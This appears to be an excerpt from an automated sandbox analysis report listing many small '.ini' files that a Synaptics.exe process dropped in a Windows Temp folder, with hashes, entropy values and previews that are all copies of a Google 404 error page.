                                                                                                                                                                    SHA1:90143737D8A950A1209807E1B7552B80471BAAD9
                                                                                                                                                                    SHA-256:13E090F2FB1C1FD1E27DF5CDEF86A3FB07EB1312E086822A93637204399B9E90
                                                                                                                                                                    SHA-512:491C6DA0AF2775FCF7E65207FC6B52E394F2F352191F2A3AE44EAA7B7D27D8C81DEF1A188D6762F0801A5C78DEE629FC858D8E95BA21E3FC738F8C0A69BFEAB8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1nQN_v4YCHmLYlVdyjVAXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\24QnPNs.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.259566156861248
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++G+pAZewRDK4mW
                                                                                                                                                                    MD5:18595591767792A3EBBFCA9C1C2D60E1
                                                                                                                                                                    SHA1:FB39DA221E044B6C58BB54EE2FACF2A2FA865553
                                                                                                                                                                    SHA-256:F12F7B730AE6983D51D464FC285F61B5F050D7A9ADC52BDA69CF79270C33EA63
                                                                                                                                                                    SHA-512:D97C72EFBCBCC8DDEAC355148602DA49E75000025BD84B8CB4C42C37D1EDFB4126CDBEDD193A8929ACDE126C61617DFAA1B172DC1A44E24BC6F257E4F332B7E0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6_iEk5OOBcM11KBsxm2hrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2FUwTGf.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.266452356441095
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0yjSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7j+pAZewRDK4mW
                                                                                                                                                                    MD5:535D9655724AD55561FBABDE3290458F
                                                                                                                                                                    SHA1:5323DF612FAE8DFCD2BE7C16542B111EDB845CFE
                                                                                                                                                                    SHA-256:2DAC706785B722A95C71F1AD0BC80AD169E9A370FAF72DCEFAF2C4957E0240F3
                                                                                                                                                                    SHA-512:BF92D03B462DA51CDC487794378C0AB51997BC6507EDE2397D42E269D64DBBB8C14624C254C956BEB8E496451F6427D4E1DCFD4792639AC76B7569DEE8338359
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mvkQAQ3bFY2U6WsaavNFDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2uAi7uv.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.256848466454581
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
                                                                                                                                                                    MD5:A9BE7D95A66EA36234A5C5B67275DB30
                                                                                                                                                                    SHA1:E4517E406B5912AD32B02A7D0E63D833F164C3EA
                                                                                                                                                                    SHA-256:90ADCB01D6885EEDCCAAFA1E74F997BADCC16548B61E05DB3FBCD82CBD3D8FE9
                                                                                                                                                                    SHA-512:46D4BA95FFEA8C85D3717765DC263053D43640C0989689B7042B34CCC6211416E93FE108FD8C5C7F9639114FA4FC3294AC65BC9396308BA0B6D34B320556858B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DctD6A-2EAiLgl6rvb_9Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4eMCWkD.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2618618261365695
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0JvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Kv+pAZewRDK4mW
                                                                                                                                                                    MD5:0D70ABBC1DC9261F754E20A9657F5008
                                                                                                                                                                    SHA1:2F8427068AECDB95DAA6EA484B6CA37F8ED1FD77
                                                                                                                                                                    SHA-256:D59ABDAFD05E56AA19504BCBF031C0D4EDC5855C8D114EA7C03978D4DC43AB34
                                                                                                                                                                    SHA-512:4DC7FDE629A0980F6488E762074E2CDD82522554798638DC1788FE688FF14AB04AD01327529EF6E44FB760B4DAC963223A4A98B6DBD778CFA27A310100708E68
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oSaTQ5o9ujUNvz1Q-J_Dvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\5epFe3i.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2558408834237085
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0JSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                                                                    MD5:F1E2892C0454D6F0AE9BA9206C3B3FEC
                                                                                                                                                                    SHA1:12930253CB83744EFEEF2749F7A4AB35BD366630
                                                                                                                                                                    SHA-256:3086BE961624BA1A1F1F06FAB5B98B7E67F85BF13ABA4C2A0546FFB09B4D90A4
                                                                                                                                                                    SHA-512:C989DA7F67738F331C1C6397E762D733108DD7BDE87E7A896767346FFB8B725A71E955939FEC5C5AACDEE45D676A9546741748C19FFB92A67271F367AE0FABEB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mzJlnEaz9uuaNgFSp0VmIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\5lKI7QU.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.261447699241621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0oDXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9T+pAZewRDK4mW
                                                                                                                                                                    MD5:009824679C6EF3B6DF027DAF3C1989BC
                                                                                                                                                                    SHA1:3A7A55734FBA140E9DEE3198A1CBF3998DE9942E
                                                                                                                                                                    SHA-256:BB93C4AF462B588A56779EB702BA39FA1D886D3CFBF1CC8A1FD801586A936D8B
                                                                                                                                                                    SHA-512:006825879EEB6C899ECAB4B38AD33DB7B8E72C045D9FAACB0BBC7F1FE7AF59E145687D4D6CFCE531F393412AAFE469C00944C3F587D547C3C7F967F3B72DA786
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rPxim9HDxGOzFF7uMXd5cw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\6IMjnAq.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.258726071012523
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+042rDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+12P+pAZewRDK4mW
                                                                                                                                                                    MD5:4AB18CD9726814601678E932424F23FC
                                                                                                                                                                    SHA1:422996A0661F7750DCEE53B8870F634B69E9F9C0
                                                                                                                                                                    SHA-256:25D0FDF093D21DC394509E2B71A17C84CEEC4385FDC1F6286A8D6F8F576E4E40
                                                                                                                                                                    SHA-512:CC3E8561D158DE3384A4E91D5F8AE8763D830A21AA1ED8168A2EABAEFB70A3101CCDD971163D1E9780E44F7B94D12CA08C5E303ED38532B7326DF53B3A765150
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0vm53CZYHGf10-ua68xulQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\9REz2sM.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2508434099332115
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0KSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                                    MD5:EF70640D658EAEF4A87C3DA91B7C6847
                                                                                                                                                                    SHA1:DC2BE09E3F2C852A438B6AB7F04A0C74B283E00B
                                                                                                                                                                    SHA-256:9C7CC382F2A75DC89FDC4191E7867167B34CB7F42DF95F2D8273B457CE6344DB
                                                                                                                                                                    SHA-512:FA3BFAAC229EBCD6095027B4EFC782D69CA8D83A4CF567715CC4CFF147CE28C0368D9C0758AE1334403805F730764721D4AF4F6B2CD1BC54F7587076B5AE5AC8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nSySyTfUZ_n0QdcnyxfdyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\A12DuOj.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2586942807733426
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0rNbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                                                                                    MD5:9A9F06A5758491A28081BFA02E2DB23E
                                                                                                                                                                    SHA1:B9E189D74323EF3BC432F0D31A6E1772B552D0A2
                                                                                                                                                                    SHA-256:6614CBEA783C4C64A7FCCD3C76D355E8610C9F87238D44A3D5D831485E474EC4
                                                                                                                                                                    SHA-512:0F2BA26E4E808ECFEC69B5D4ECF1B208CB35E9724808015A1DF64EFD1670480F296DC2AC34FA922DC89D09B91D205894E0D45D473E49F0145A44624BFD5C5513
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3Jw4tCbq9hCfqa6N22TdoQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\BR2D9es.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.255722828462531
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0g7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r7+pAZewRDK4mW
                                                                                                                                                                    MD5:12B82D5EE4935405C57E534F143E26BF
                                                                                                                                                                    SHA1:5461ED3731234EE412445220A0CE51114012D750
                                                                                                                                                                    SHA-256:ADFAB9BE61E8151DEDE7091E4D27C013D8CBE6031C8D1E55AD86602F30183B35
                                                                                                                                                                    SHA-512:06807441AB7F00D2747DC86CAC0D4B3FFE6D629D9514AA773D0755BD9A7B729B5DC9EFE8839D362049A36886167530CB0F0BBB34A37D048DA744D4B8C3ADAC8E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Cc2XceSjvx5Qjlp5-CUybw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\BW45XIw.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.262587616936988
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0+NSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tN+pAZewRDK4mW
                                                                                                                                                                    MD5:C056B9C34FC42317EA4D540AF9D50D30
                                                                                                                                                                    SHA1:C6FF977F8BA8D453099095BEE49FA36AF9AA3AD3
                                                                                                                                                                    SHA-256:D4737C3E591E1B03ADE79C4672E1AED60BF3CD15B32957EE2D5BF0EC0E02CA5C
                                                                                                                                                                    SHA-512:7DA16AD7A640261FCF831723C61C22D5FDD0ED350BB4413C1F0FB15B20DDAFBA69F4E40007923674E45401E50512CD1CB552106BD3309BBC5467079F43F0F449
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JaZ4cPr4PKEKCoHL3koaKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\BgD7m1J.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.264172967755591
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0dQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sQ+pAZewRDK4mW
                                                                                                                                                                    MD5:693A61881D5999853961FF113C22CC4F
                                                                                                                                                                    SHA1:45E1D7CD88D5053E90DDC6D44C24FD1D3D7B883C
                                                                                                                                                                    SHA-256:37B0527DD14C3C383E52BA82BA45DDD346D865E0CD280347864CB398A8068CA1
                                                                                                                                                                    SHA-512:6621A45E9663E34EC3BB9CEA3E48778F33816A80A0D9226DD4F81DF7213150CD9BD5FACB3840E31E41CD6BD045075F06E5B5FEAA5181EB89783D1DD96B7743C6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="o3r3b3HjZG5QO7bSnGnFqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\CF5aAWp.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.244193108162035
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7+pAZewRDK4mW
                                                                                                                                                                    MD5:0F3AFEB7EC6B3282A24997A8A1AE39B1
                                                                                                                                                                    SHA1:7A58C6D22D635B6ABF28A8C62F85E085312E9971
                                                                                                                                                                    SHA-256:11215D8E5EFEC2935730E6AC289E1C350C49F2F690712E7B32AC76566253024C
                                                                                                                                                                    SHA-512:351C14766DE61D5DB4EE16B056BDFB318EDE7611185FD8A4DA2BD54BD9B388E2149EC3378F9066D63FDA532F1115FC84177604057E5555E41F0D75A232D4DEF1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l1opnM0qZKooL_vucj5rmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\DR3vSmR.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.252051715120241
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0ESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                                                    MD5:E46A33BB4FB9308F7EF7CA14D1E8501A
